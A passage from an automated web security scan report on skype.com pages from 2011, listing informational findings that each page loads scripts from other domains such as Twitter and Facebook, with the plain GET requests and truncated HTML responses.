<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.584. http://www.skype.com/intl/en-us/features/allfeatures/skype-wifi/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/skype-wifi/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/skype-wifi/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:37 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 60142


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype WiFi - Wireless Internet Access from WiFi Hotspots - Skype</title>
   <meta name="de
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.585. http://www.skype.com/intl/en-us/features/allfeatures/sms  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/sms

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/sms HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:24 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 65085


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>SMS - Send Text Messages to Mobiles Online - Skype Features</title>
   <meta name="descrip
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.586. http://www.skype.com/intl/en-us/features/allfeatures/sms/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/sms/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/sms/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:34 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 65085


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>SMS - Send Text Messages to Mobiles Online - Skype Features</title>
   <meta name="descrip
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.587. http://www.skype.com/intl/en-us/features/allfeatures/video-call  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/video-call

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/video-call HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:22 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 47389


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Video Calls - Free Video Calls - Skype</title>
   <meta name="description" content="Free v
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.588. http://www.skype.com/intl/en-us/features/allfeatures/video-call/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/video-call/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/video-call/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:31 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 47389


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Video Calls - Free Video Calls - Skype</title>
   <meta name="description" content="Free v
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.589. http://www.skype.com/intl/en-us/features/allfeatures/voicemail  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/voicemail

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/voicemail HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:25 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 43704


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype Voicemail - Online Voicemail - Skype</title>
   <meta name="description" content="Ne
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.590. http://www.skype.com/intl/en-us/features/allfeatures/voicemail/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/features/allfeatures/voicemail/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/features/allfeatures/voicemail/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:35 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 43704


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype Voicemail - Online Voicemail - Skype</title>
   <meta name="description" content="Ne
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.591. http://www.skype.com/intl/en-us/get-skype  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:44 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 41579


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Get Skype - Download for free</title>
   <meta name="description" content="Make Skype a pa
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.592. http://www.skype.com/intl/en-us/get-skype/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:02 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 41579


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Get Skype - Download for free</title>
   <meta name="description" content="Make Skype a pa
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.593. http://www.skype.com/intl/en-us/get-skype/home-phone  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype/home-phone

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype/home-phone HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:59 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 40820


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype for Home Phones - Use Skype on your phone today - Skype</title>
   <meta name="descr
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.594. http://www.skype.com/intl/en-us/get-skype/home-phone/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype/home-phone/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype/home-phone/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:00 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 40820


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Skype for Home Phones - Use Skype on your phone today - Skype</title>
   <meta name="descr
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.595. http://www.skype.com/intl/en-us/get-skype/home-phone/cordless-phone  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype/home-phone/cordless-phone

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype/home-phone/cordless-phone HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:00 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 56977


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Use Skype at home on your Cordless Phone - Skype</title>
   <meta name="description" conte
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.596. http://www.skype.com/intl/en-us/get-skype/home-phone/cordless-phone/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype/home-phone/cordless-phone/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype/home-phone/cordless-phone/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:01 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 56977


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Use Skype at home on your Cordless Phone - Skype</title>
   <meta name="description" conte
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.597. http://www.skype.com/intl/en-us/get-skype/home-phone/phone-adapter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype/home-phone/phone-adapter

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype/home-phone/phone-adapter HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:59 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 59272


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Use Skype on your Home Phone with a ConnectMe Adapter - Skype</title>
   <meta name="descr
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</h1>

<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.598. http://www.skype.com/intl/en-us/get-skype/home-phone/phone-adapter/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype/home-phone/phone-adapter/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype/home-phone/phone-adapter/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:40:01 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 59272


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Use Skype on your Home Phone with a ConnectMe Adapter - Skype</title>
   <meta name="descr
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</h1>

<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.599. http://www.skype.com/intl/en-us/get-skype/on-your-computer/click-to-call  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype/on-your-computer/click-to-call

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype/on-your-computer/click-to-call HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:46 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 43750


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Click to call - Call local numbers directly from your browser - Skype</title>
   <meta nam
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.600. http://www.skype.com/intl/en-us/get-skype/on-your-computer/click-to-call/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype/on-your-computer/click-to-call/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype/on-your-computer/click-to-call/ HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 21:39:49 GMT
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=Edge,chrome=1
Connection: close
Content-Type: text/html; charset=utf-8
Content-Language: en
Content-Length: 43750


<!DOCTYPE html>
<html lang="en-US" >
<head>

   
   <!-- Meta -->
   <meta charset="utf-8" />
   <title>Click to call - Call local numbers directly from your browser - Skype</title>
   <meta nam
...[SNIP]...
</script>


   <script src="http://www.skypeassets.com/i/js/ab/mbox.js" type="text/javascript" charset="utf-8"></script>


   <script type="text/javascript" src="http://www.skypeassets.com/i/js/skype-common.js"></script>
...[SNIP]...
<!-- Page specific javascripts-->
   

           <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/clientlib-min.js"></script>
...[SNIP]...
</script>

   
       <script type="text/javascript" src="http://www.skypeassets.com/i/js/segmentation/segmentation-publish.js"></script>
...[SNIP]...
</script>


<script src="http://www.skypeassets.com/i/js/wanalytics/wanalytics-static.js" type="text/javascript" charset="utf-8"></script>
...[SNIP]...
</div><script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...

18.601. http://www.skype.com/intl/en-us/get-skype/on-your-computer/linux  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skype.com
Path:   /intl/en-us/get-skype/on-your-computer/linux

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intl/en-us/get-skype/on-your-computer/linux HTTP/1.1
Host: www.skype.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
